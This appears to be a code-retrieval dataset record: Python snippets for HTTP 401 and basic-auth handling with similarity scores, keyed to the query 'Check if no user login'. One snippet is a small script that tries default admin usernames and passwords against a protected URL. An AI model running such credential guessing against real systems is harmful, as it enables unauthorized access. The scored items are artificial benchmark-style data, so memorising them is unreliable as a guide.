realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response('Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials',\n 401,\n {\n 'WWW-Authenticate': 'Basic realm=\"Login Required\"'\n }\n )", "def authenticate():\n return send_msg(\n 401,\n 'Must be connected',\n headers={'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return flask.Response('Login required.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL, need token.\\n', 403,\n {'WWW-Authenticate': 'Basic realm=\"token Required\"'})", "def authenticate(self):\n return Response(\n 'Could not verify your access level for that URL.\\nYou have to login with proper credentials',\n 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def user_must_authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with Web Manager credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def unauthorized():\n return HttpError(401)", "def basic_auth_error():\n logger.debug(\"Basic authentication failed.\")\n return unauthorized(\"Invalid credentials.\")", "def response_unauthorised():\n\n response = {\n 'status': 'failed',\n 'error': 'Not Authorised'\n }\n\n return response_json(response, status=401)", "def challenge(self, environ, status, app_headers=(), forget_headers=()):\n resp = Response()\n resp.status = 401\n resp.headers = self.forget(environ, {})\n for headers in (app_headers, forget_headers):\n for name, value in headers:\n resp.headers[name] = value\n resp.content_type = \"text/plain\"\n resp.body = \"Unauthorized\"\n return resp", "def authenticate(self):\n resp = Response(None, 401)\n abort(401, description='Please provide proper credentials', response=resp)", "def _login(self, environ, start_response):\n response = HTTPUnauthorized()\n response.www_authenticate = ('Basic', {'realm': self._realm})\n return response(environ, start_response)", "def add_basic_auth(blueprint: Blueprint, username, password, realm='api'):\n\n @blueprint.before_request\n def basic_http_auth(*args, **kwargs):\n auth = request.authorization\n if auth is None or auth.password != password or auth.username != username:\n return Response('Please login', 401, {'WWW-Authenticate': f'Basic realm=\"{realm}\"'})", "def authenticate():\n return abort(401)", "def unauthorized():\n return {'errors': ['Unauthorized']}, 401", "def forget(self, request):\n return [('WWW-Authenticate', 'Basic realm=\"%s\"' % self.realm)]", "def _respond_unauthorized(self, request, message=\"Unauthorized\"):\n resp = Response()\n resp.status = 401\n resp.headers = self.forget(request.environ, {})\n resp.content_type = \"text/plain\"\n resp.body = message\n request.environ[\"repoze.who.application\"] = resp\n return None", "def authenticate():\n resp = {\"status\": 401, \"message\": \"Could not verify your access level for that URL\"}\n return Response(dumps(resp), status=404, mimetype='application/json')", "def hidden_basic_auth(user=\"user\", passwd=\"passwd\"):\n\n if not check_basic_auth(user, passwd):\n return status_code(404)\n return jsonify(authenticated=True, user=user)", "def CR_authentication():\n \n # create a random 10 character string\n choices = string.letters + string.digits + string.punctuation;\n randomString = ''.join(random.choice(choices) for i in range(10))\n session['challenge'] = randomString\n \n return Response('Access failed.', 401, {'WWW-Authenticate': str.format('Basic realm=\\\"Protected iStreet event data; Challenge: {0}\\\"', randomString)})", "def authenticate():\n return Response(\n '''Login Required - email acaceres@0-sec.net for access or DM him @_hyp3ri0n on Twitter. Please do so from a corporate email or\n with some kind of proof that you are a security engineer, academic, or need this data for research purposes (e.g. email from a corporate or .edu email or provide\n a linkedin or twitter account showing as much)\n You have to login with proper credentials''', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required - email acaceres@0-sec.net for access or DM him @_hyp3ri0n on Twitter. Please do so from a corporate email or with some kind of proof that you are a security engineer, academic, or need this data for research purposes (e.g. email from a corporate or .edu email or provide a linkedin or twitter account showing as much)\"'})", "def auth_failure():\n return \"Request denied due to failed authorization\", 201, {'Content-Type': 'text/html'}", "def unauthorized(self, error):\n return jsonify({'error': \"NOT AUTHORIZED\"}), 401", "def _handle_authentication_error(self):\n response = make_response('Access Denied')\n response.headers['WWW-Authenticate'] = self.auth.get_authenticate_header()\n response.status_code = 401\n return response", "def authenticate():\n\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n get_auth_headers())", "def test_unauthorized_exception(exception_app):\n request, response = exception_app.test_client.get('/401')\n assert response.status == 401\n\n request, response = exception_app.test_client.get('/401/basic')\n assert response.status == 401\n assert response.headers.get('WWW-Authenticate') is not None\n assert response.headers.get('WWW-Authenticate') == \"Basic realm='Sanic'\"\n\n request, response = exception_app.test_client.get('/401/digest')\n assert response.status == 401\n\n auth_header = response.headers.get('WWW-Authenticate')\n assert auth_header is not None\n assert auth_header.startswith('Digest')\n assert \"qop='auth, auth-int'\" in auth_header\n assert \"algorithm='MD5'\" in auth_header\n assert \"nonce='abcdef'\" in auth_header\n assert \"opaque='zyxwvu'\" in auth_header\n\n request, response = exception_app.test_client.get('/401/bearer')\n assert response.status == 401\n assert response.headers.get('WWW-Authenticate') == \"Bearer\"", "def display_401(error):\n return render_template('/error401.html'), 401", "def test_unauthorized(self):\n self._error_test(fitbit_exceptions.HTTPUnauthorized)", "def basic_auth(user=\"user\", passwd=\"passwd\"):\n\n if not check_basic_auth(user, passwd):\n return status_code(401)\n\n return jsonify(authenticated=True, user=user)", "def test_unauthenticated_request(self):\n url = self.get_url(self.active_user.id)\n response = self.client.get(url)\n\n expected_status_code = 401\n self.assertEqual(response.status_code, expected_status_code)", "def basic_http_auth(f):\n def wrap(request, *args, **kwargs):\n if request.META.get('HTTP_AUTHORIZATION', False):\n authtype, auth = request.META['HTTP_AUTHORIZATION'].split(' ')\n auth = base64.b64decode(auth)\n username, password = auth.split(':')\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return f(request, *args, **kwargs)\n else:\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n \n return wrap", "def auth_error():\n return unauthorized('Invalid credentials')", "def require_http_auth(request):\n\n if http_auth_allowed(request) and not request.user.is_authenticated:\n site = get_current_site(request)\n response = HttpResponse(status=401)\n response['WWW-Authenticate'] = (\n 'Basic realm=\"{}\", charset=\"UTF-8\"'.format(site.name)\n )\n # Check whether the client supports cookies.\n response.set_cookie('testcookie', '1', secure=(not settings.DEBUG),\n httponly=True, samesite='Lax')\n return response\n else:\n raise PermissionDenied()", "def response_401(description=None):\n resp_def = dict(util.RESPONSE_404)\n if description is not None:\n resp_def['description'] = description\n\n return response(401, resp_def)", "def http_basic_auth():\n users = ['administrator', 'admin']\n passwords = ['administrator', 'admin']\n protectedResource = 'http://localhost/secured_path'\n foundPass = False\n for user in users:\n if foundPass:\n break\n for passwd in passwords:\n encoded = base64.encodestring(user + ':' + passwd)\n response = requests.get(protectedResource, auth=(user, passwd))\n if response.status_code != 401:\n print('User Found!')\n print('User: %s, Pass: %s' % (user, passwd))\n foundPass = True\n break", "def assertHttpUnauthorized(self, resp):\r\n return self.assertEqual(resp.status_code, 401)", "def basic_auth_required(view_func):\n # http://djangosnippets.org/snippets/448/\n def _auth(request, *args, **kwargs):\n if 'HTTP_AUTHORIZATION' in request.META:\n auth = request.META['HTTP_AUTHORIZATION'].split()\n if len(auth) == 2:\n if auth[0].lower() == \"basic\":\n uname, passwd = base64.b64decode(auth[1]).split(':')\n user = authenticate(username=uname, password=passwd)\n if user is not None:\n if user.is_active:\n return view_func(request, *args, **kwargs)\n response = HttpResponse(\"Authorization Required\", status=401)\n response['WWW-Authenticate'] = 'Basic realm=\"Secure Area\"'\n return response\n return _auth", "def http_basic_auth(func):\r\n\t@wraps(func)\r\n\tdef _decorator(request, *args, **kwargs):\r\n\r\n\t\tif request.META.has_key('HTTP_AUTHORIZATION'):\r\n\t\t\ttry:\r\n\t\t\t\tauthmeth, auth = request.META['HTTP_AUTHORIZATION'].split(' ', 1)\r\n\t\t\t\tif authmeth.lower() == 'basic':\r\n\t\t\t\t\tauth = auth.strip().decode('base64')\r\n\t\t\t\t\tusername, password = auth.split(':', 1)\r\n\t\t\t\t\tuser = authenticate(username=username, password=password)\r\n\r\n\t\t\t\t\tif user:\r\n\r\n\t\t\t\t\t\tlogin(request, user)\r\n\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\r\n\t\t\t\t\t\treturn HttpResponseForbidden()\r\n\r\n\t\t\texcept ValueError:\r\n\t\t\t\t# Bad HTTP_AUTHORIZATION header\r\n\t\t\t\treturn HttpResponseForbidden()\r\n\t\t\t\t\r\n\t\treturn func(request, *args, **kwargs)\r\n\treturn _decorator", "def unauthorized(self, message=None):\n return self.send_message(message, status=401)", "def basic_auth_required(fn):\n @wraps(fn)\n def _wrapper(request, *args, **kwargs):\n authentication = request.headers.get('Authentication', None)\n\n if authentication:\n if not authentication.startswith(\"Basic \"):\n request.response.status = 401\n\n return {\n 'error': \"Authentication failed!\"\n }\n\n auth_data = authentication[6:]\n\n try:\n username, password = base64.urlsafe_b64decode(auth_data).decode(\"UTF8\").split(\":\")\n\n user = request.dbsession.query(User).filter(\n User.email == username\n ).one()\n\n if user.is_password(password.encode(\"UTF8\")):\n return fn(request, *args, **kwargs)\n except (ValueError, NoResultFound):\n pass\n\n request.response.status = 401\n\n return {\n 'error': 'Authentication failed!'\n }\n\n return _wrapper", "def test_user_get_failure_using_basic_auth(self):\n # setup\n user = self.generate_username_password()\n resp = self.create_user(user)\n resp_body = resp.json()\n try:\n assert resp.status_code == 201\n assert resp.headers[\"Content-Type\"] == \"application/json; charset=utf-8\"\n assert resp_body[\"username\"] == user[\"userName\"]\n assert resp_body[\"userID\"] != \"\"\n except AssertionError:\n raise\n finally:\n self.pprint_request(resp.request)\n self.pprint_response(resp)\n uuid_ = str(uuid.uuid4())\n\n # test\n resp2 = self.get_user_basic_auth(uuid_, user)\n resp_body2 = resp2.json()\n assert resp2.status_code == 401\n assert resp2.headers[\"Content-Type\"] == \"application/json; charset=utf-8\"\n assert resp_body2[\"code\"] == \"1207\"\n assert resp_body2[\"message\"] == \"User not found!\"\n\n # teardown:\n resp3 = self.delete_user_basic_auth(resp_body[\"userID\"], user)\n try:\n assert resp3.status_code == 204\n except AssertionError:\n raise\n finally:\n self.pprint_request(resp3.request)\n self.pprint_response(resp3)", "def test_unhappy_path_unauthorized(self):\n\n response = self.client.get(self.url)\n expected_data = {\"detail\": \"Authentication credentials were not provided.\"}\n\n self.assertDictEqual(response.data, expected_data)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_no_auth(self):\n url = 'https://domain.com/project/objects.inv'\n expected = 'https://domain.com/project/objects.inv'\n actual = _strip_basic_auth(url)\n assert expected == actual", "def test_unauthorized_access(flask_test_client, http_method, endpoint):\n response = flask_test_client.open(\n method=http_method, path=endpoint, headers=get_headers()\n )\n assert response.status == \"401 UNAUTHORIZED\"\n assert response.content_type == \"application/json\"\n assert response.json[\"message\"] == \"Access token is invalid or expired.\"", "def test_get_unauthenticated(self):\n del self.client.request_kwargs['auth']\n self.verify_get_response(self.client.get(STATUS_PATH))", "def get_authenticate_header(self):\n return f'Basic realm=\"{self.www_authenticate_realm}\"'", "def test_retrieve_user_unauthorized(self):\r\n res = self.client.get(ME_URL)\r\n\r\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def basic_header(self):\n self.auth = base64.encodestring('%s:%s' % (self.username, self.password)).replace('\\n', '')\n return { \n #\"Authorization\" : \"Basic %s\" % self.auth, \n \"Content-type\": \"text/plain\" }", "def test_retrieve_unauthorized_user(self):\n\n response = self.client.get(URL_ME)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_user_unauthorized(self):\n res = self.client.get(ME_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_user_unauthorized(self):\n res = self.client.get(ME_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)", "def challenge_view(self, request):\n headerlist = [(\"Content-Type\", \"text/plain\")]\n headerlist.extend(self._get_challenge_headers(request))\n return Response(\"Unauthorized\", status=\"401 Unauthorized\",\n headerlist=headerlist)", "def denied_response(self, req):\n if req.remote_user:\n return HTTPForbidden(request=req)\n else:\n return HTTPUnauthorized(request=req)", "def test_401_unauthorized(app, client):\n\n @app.route(\"/401\")\n def unauthorized():\n abort(401)\n\n response = client.get(\"/401\")\n assert response.status_code == 401\n assert \"401 Unauthorized\" in str(response.data)", "def test_status_unauthenticated(self):\n rv = self.client.post('/statusize/', data={'message': 'foo'},\n follow_redirects=True)\n eq_(rv.status_code, 403)", "def test_call_unauthenticated(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(401)\n with self.assertRaises(APIError):\n data = client.call(**self.build_parameters)", "def test_unhappy_path_unauthorized(self):\n\n response = self.client.post(self.url)\n expected_data = {\"detail\": \"Authentication credentials were not provided.\"}\n\n self.assertDictEqual(response.data, expected_data)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)", "def test_retrieve_users_unauthorized(setup_client):\n client = setup_client\n res = client.get(ME_URL)\n assert res.status_code == status.HTTP_401_UNAUTHORIZED", "def __call__(self, resp):\r\n if not self.auth_token:\r\n self.auth()\r\n resp.register_hook('response', self.handle_error)\r\n resp.headers['X-Auth-Token'] = self.auth_token\r\n return resp", "def _handle_401(self, response, **kwargs):\n if not response.status_code == 401 and not response.status_code == 403:\n return response\n\n # Free the original connection\n response.content\n response.close()\n\n # copy the request to resend\n newreq = response.request.copy()\n\n self._access_token = None\n self._logger.debug(\"_handle_401, cleared _access_token, retrying with new token\")\n\n newreq.headers[\"Authorization\"] = self._get_auth_value()\n\n _response = response.connection.send(newreq, **kwargs)\n _response.history.append(response)\n _response.request = newreq\n\n return _response" ]
[ "0.8093736", "0.80926424", "0.7958403", "0.7852648", "0.7843114", "0.7824419", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.7810746", "0.776624", "0.7754693", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.774767", "0.771945", "0.7667712", "0.7664151", "0.76493174", "0.7613103", "0.7591923", "0.74499536", "0.74152935", "0.7389793", "0.73102117", "0.72994584", "0.70069116", "0.6989699", "0.6985984", "0.69489896", "0.69403917", "0.69043815", "0.6843354", "0.6842244", "0.6816229", "0.67638755", "0.6701405", "0.6700694", "0.6666637", "0.66607744", "0.66428447", "0.66164446", "0.66088307", "0.6551196", "0.6548378", "0.64217687", "0.6410419", "0.6393135", "0.6381609", "0.6327866", "0.629943", "0.6287014", "0.62427884", "0.6242011", "0.6230159", "0.62130815", "0.6168915", "0.61408406", "0.6088527", "0.60420007", "0.6041198", "0.6029272", "0.6020013", "0.601565", "0.5991479", "0.59679294", "0.5945756", "0.59284157", "0.59284157", "0.5922706", "0.59027636", "0.58849794", "0.58700204", "0.58687663", "0.5866924", "0.58479726", "0.58452344", "0.5829068" ]
0.76140213
41
Check if no user login
def require_visitor(func): @wraps(func) def decorator(*args, **kwargs): if g.user: return redirect(url_for('site.home')) return func(*args, **kwargs) return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_user_and_login(self) -> Response:\n pass", "def check_auth_none(self, username):\n return AUTH_FAILED", "def check_user_logged():\n global user\n if 'user' not in session:\n return False\n else:\n user = session.get('user')\n return user['username'] != ''", "def validUser(self):\n if self.state == SessionStates.LOGGED_OUT:\n return False\n\n # if self.user == None:\n # return False\n return True", "def test_user_login_attempt_when_user_already_logged_in(self):\n\t\tpass", "def test_non_existing_user_login(self):\n user = {\n 'email': 'test@gmail.com',\n 'password': 'password123'}\n res = self.app.post('/login', data=user)\n self.assertEqual(res.status_code, 200)\n self.assertIn(\"You have no account\", str(res.data))", "def require_login(self):\n\tif users.get_current_user():\n\t return True\n\telse:\n\t self.redirect(users.create_login_url(self.request.uri))\n\t return False", "def check_login(request, username=None):\r\n if request.user is None:\r\n return False\r\n\r\n # if we have a username we're told to check against, make sure the\r\n # username matches\r\n if username is not None and username != request.user.username:\r\n return False\r\n\r\n return True", "def logged_in(self):\n return self.auth.get_user_by_session() is not None", "def test_username_not_exist(self):\n\n url_extend = 'user_auth/login/'\n # get the first input button under the first form in login page.\n username = 'usersomerandomeuser'\n password = 'user'\n login_button = login(self.browser, self.url + url_extend, username, password)\n try:\n login_button.click()\n except:\n raise Exception(\"Login Error!\")\n\n ## check the current url\n assert self.browser.current_url == self.url + url_extend", "def test_not_authenticated(self):\n self.client.logout()\n response = self._get(get_kwargs=self._data())\n self._check_response(response, 101)\n self.assertEqual(UserFitbit.objects.count(), 1)", "def __check_user_exist(self):\n\n login_form = self.login_form()\n\n user = User.query.filter_by(username=login_form.username.data).first()\n if user is None or not user.get_password(login_form.password.data):\n flash('Invalid username or password') # TODO: flash in Template hinzufuegen\n return redirect(url_for('login'))\n\n login_user(user, remember=login_form.remember_me.data)\n\n next_page = request.args.get('next')\n\n # if 'next' is found and the host is specified\n # it will redirect\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n\n return redirect(next_page)", "def is_correct_user(self, login, password):\n pass", "def check_user(self):\n try:\n if self.get_customer()[0][0] == self.dni:\n return True\n else:\n return False\n except:\n return False", "def has_user(self):\n\t\treturn len( self.a_token ) > 0 and len( self.a_secret ) > 0", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def can_log_in_without_cas(self):\n return self.password is not None and self.password != \"\"", "def test_non_user_login(self):\n self.user.list_of_accounts = [{'username': 'Parseen',\n 'pwd': 'mypassword',\n 'email': 'david.parseen@yahoo.com'}]\n msg = self.user.login(\"nonuser@yahoo.com\", \"idontevenhaveone\")\n self.assertEqual(msg, \"Account not registered, sign up\")", "def test_login_route_no_user(self):\n result = self.client.post(\"/login\",\n data={\"username\":\"test_user2\", \"password\":\"test_pass1\"}, follow_redirects=True)\n self.assertEqual(result.status_code, 200)\n self.assertIn(b\"Looks like you have not made an account yet!\", result.data)", "def check_if_should_always_be_logged_in(connection,username_log):\r\n with connection:\r\n c = connection.execute(SELECT_USER_BY_LOGIN_PREVILAGES, (username_log,))\r\n return c.fetchone()", "def test_nonexistent_user(self):\n self.client.login(username=self.global_staff.username, password=self.password)\n resp = self.client.get(self.get_url('IDoNotExist'))\n assert resp.status_code == status.HTTP_404_NOT_FOUND", "def is_logged_in():\n return 'user' in session", "def isLoggedIn(self):\n session = self.getSession()\n if session is not None:\n return True\n return False", "def test__user_passed_as_none(self):\r\n access.has_access(None, 'staff', 'global', None)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_not_logged_user_cannot_access(self):\n\n utils.test_not_logged_cannot_access(self, self.url)", "def test_login_no_user(self):\n post_data = client.post(LOGIN_URL, json=self.post_data1)\n self.assertEqual(post_data.status_code, 401)\n self.assertEqual(post_data.get_json()[\"msg\"], \"Incorrect username.\")", "def check_auth():", "def check_user(user):\n result_user = search_column_with_constraint(choose_database(\"auth\"), \"users\", \"id\", \"id\", user)\n # result_user = search_single_entry(choose_database(\"auth\"), \"users\", \"id\", user)\n\n if len(result_user) == 0:\n return 0\n else:\n return 1", "def test_login_for_user_not_registered(self):\n response = self.client.post(LOGIN_URL,\n data=json.dumps(\n {'username': 'otieno', 'password': 'otieno254'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 404)\n result = json.loads(response.data.decode())\n self.assertEqual(result['message'], 'User unavailable')", "def test_no_user(self):\n self.request.user = None\n result = user_id_get_view(self.request)['d']\n self.assertEqual(result, error_dict('api_errors', 'not authenticated for this request'))", "def is_regular_user(user):\n return user.is_authenticated()", "def invalid_user(self, username):\n con = dbcon()\n cur = con.cursor()\n cur.execute(\"SELECT * FROM my_users WHERE username=%(username)s\",\\\n {'username':username})\n rows = cur.rowcount\n if rows > 0:\n return True\n return False", "def is_logged_in(self) -> bool:\n return self.id is not None and self.username is not None", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def check_user(self, username):\n self.dbcursor.execute(self.SQL_CHECK_USER, [username])\n row = self.dbcursor.fetchone()\n if row:\n return True \n return False", "def verifyLogin():\n global HUB\n\n loginInfo = FloatingTools.userData()['Login']\n if loginInfo['username'] is None or loginInfo['password'] is None:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False\n try:\n HUB = Github(loginInfo['username'], loginInfo['password'])\n for repo in HUB.get_user().get_repos():\n break\n FloatingTools.Dashboard.setDashboardVariable('logged_in', True)\n return True\n except BadCredentialsException:\n FloatingTools.Dashboard.setDashboardVariable('logged_in', False)\n return False", "def test_func(self):\n if not self.request.user.is_authenticated:\n return False\n if self.request.user.is_staff:\n return True\n return self.get_user() == self.request.user", "def logged_in(self):\n return self.user is not None", "def logged():\n if session.login==1:\n return True\n else:\n return False", "def is_user(self, user='') -> int:\n try:\n if user in self.users:\n return(1)\n else:\n return(0)\n except Exception as error:\n print(f\"Error: self.is_user({user}) -> {error}\")", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def test_not_authenticated(self):\n pass # lint-amnesty, pylint: disable=unnecessary-pass", "def has_user(self, user): # pylint: disable=unused-argument\r\n return False", "def user_exists(self, login):\n\t\tif login in self.users_by_name and isinstance(self.users_by_name[login], VDOM_user):\n\t\t\treturn True\n\t\treturn False", "def _check_auth(self):\n if self.authToken:\n return True\n else:\n msg = \"you need to login\"\n self.raise_error(msg)", "def has_username(self):\n return self.username is not None", "def test_returns_none_if_no_user(self):\r\n self.assertIsNone(PasswordlessAuthenticationBackend().get_user('edith@example.com'))", "def check_authentication():\r\n\r\n #TODO: Reservation based authentication\r\n try:\r\n authenticated_user()\r\n except Exception as e:\r\n return e\r\n\r\n return True", "def user_auth(request):\n if request.user.is_authenticated:\n user = User.objects.get(email=request.user.email)\n if UserInformation.objects.filter(user=user).exists():\n return True\n return False", "def user_in_session():\n return 'user_id' in login_session", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def test_unauthenticated(self):\n self.browser.open(\"http://nohost/plone/full_review_list\")\n self.assertTrue(\"Login Name\" in self.browser.contents)", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def validate_login(self, request):\n\n if 'id' not in request.session or 'steam_id' not in request.session:\n raise PermissionDenied('You need to login')\n\n # if self.mode9:\n # if 'team' not in PlayerList[request.session['id']]:\n # raise PermissionDenied('Player is not in a team!')", "def login_user():\n pass", "def check():\n # Sets variable username to username inputed by user\n username = request.args.get(\"username\")\n # Selects userid from username inputed by user (if there is one)\n userinfo = db.execute(\"SELECT * FROM users WHERE username = :username\", username=username)\n # If there is no info on the username inputed, that means username is not taken, and user can take the username\n if not userinfo:\n # Return true for the username is not taken\n return jsonify(True)\n # Return false if there is info on the username (meaning it was taken)\n return jsonify(False)", "def test_login_login_inexisting_user_false(self):\n logins = {\n \"Email\": \"user@example.com\",\n \"Password\": \"pass1234\"\n }\n resp = self.client().post('/api/v1/auth/login', data=logins)\n self.assertEqual(resp.status_code, 400)\n resp = resp.get_json()\n self.assertEqual(resp['error'],\n 'User not found in our database')", "def is_logged_in():\n logged_in = \"uid\" in session\n if logged_in:\n user = api.user.get_user(uid=session[\"uid\"])\n if not user or (user.get(\"disabled\", False) is True):\n logout()\n return False\n return logged_in", "def is_logged(html):\n soup = BeautifulSoup(html, \"html.parser\")\n\n if soup.find('div', {'id': 'user_information'}) is None:\n return False\n return True", "def test_no_user_exists(self):\n actual = get_user_if_exists(None, self.details)\n self.assertDictEqual(actual, {})", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_registered_user_login(self):\n self.request.user.is_active = True\n self.request.user.is_registered = False\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def is_new_user_service(uid):\n user = user_dao.get_user_by_uid_dao(uid)\n return user is None", "def logged_in(request):\n return request.current_user is not None", "def checkLogin():\n if 'access_token' in login_session:\n return True\n else:\n return False", "def is_logged_in(self):\n return self.router.token is not None", "def check_user(used_name, used_password):\n user_exists = UserData.user_login(used_name, used_password)\n\n return user_exists", "def default_login_works(self):\n return True if self.default_login_auth_header else False", "def test_get_user_non_exist_id(self):\n print('(' + self.test_get_user_non_exist_id.__name__+')',\n self.test_get_user_non_exist_id.__doc__)\n self.assertIsNone(self.connection.get_user(NON_EXIST_PATIENT_USERNAME))", "def test_nonexistent_user_login(self):\n\n fake_user = {\"email\": \"eat@me.com\",\n \"password\": \"lolzIKid\"}\n\n res = self.client.post(\n \"/api/v2/auth/login\", data=json.dumps(fake_user), content_type=\"application/json\")\n result = json.loads(res.data)\n self.assertEqual(result[\"Error\"], \"User does not exist\")\n self.assertEqual(res.status_code, 404)", "def _has_data(cls):\n return User.objects.count() > 0", "def checkLogin(self):\n if self._thread:\n return False\n\n try:\n return self._checkLogin()\n except Exception:\n self.expired = True\n self.finished = True\n\n return False", "def check_login(self, u, p):\r\n\t\tlogger.debug(\"Entering\")\r\n\t\t\r\n\t\ttry:\r\n\t\t\tval = login.validate_user(u, p)\r\n\t\texcept ValueError as e:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, e.message\r\n\t\t\r\n\t\tif val:\r\n\t\t\tlogger.debug(\"Exiting - success\")\r\n\t\t\treturn True, \"Login successful!\"\r\n\t\telse:\r\n\t\t\tlogger.debug(\"Exiting - failure\")\r\n\t\t\treturn False, \"Login failed.\"", "def is_logged_in():\n _has_cookie = util.web.has_cookie('pass')\n if _has_cookie:\n _is_expired = util.web.is_cookie_expired('pass')\n if _is_expired:\n return False\n return True\n return False", "def is_user(username: str) -> bool:\n db = get_db()\n if username is None:\n return False\n return not db.get_user_by_name(username) is None", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def test_non_active_user_login(self):\n self.request.user.is_active = False\n self.request.user.is_registered = True\n self.request.user.is_superuser = True\n self.request.user.is_staff = True\n nt.assert_equal(self.view.test_func(), False)", "def is_logged_in(self):\n return self.cookie is not None", "def test_login_missing_username(self):\n resp = self.client.post(\n reverse('login'),\n json.dumps({\n \"password\": \"pass\",\n }),\n content_type=\"application/json\"\n )\n assert resp.status_code == 400, resp.content.decode('utf-8')\n assert not self.is_authenticated(self.user)", "def is_anonymous():\n return False", "def check_for_user_not_in_system(player_name: str) -> bool:\n\n for uid, user in self.connected_users.items():\n if user['authorized'] and user['main']['player_name'] == player_name:\n return False\n return True", "def test_non_registered_user_trying_to_login(self): \n # try logging in the user without registering the user \n res = self.client().post(AuthTestCase.login, data=self.user)\n # bad request \n self.assertEqual(res.status_code, 401)", "def no_network_access_check(user):\n return not user.has_property(\"network_access\")", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def test_returns_401_if_user_not_logged_in(self):\n # Act\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, 401)", "def loginState(self, user_data):\n\t\tif self.db.request(\"getOne\", user_data):\n\t\t\treturn True;\n\t\telse:\n\t\t\treturn False;", "def 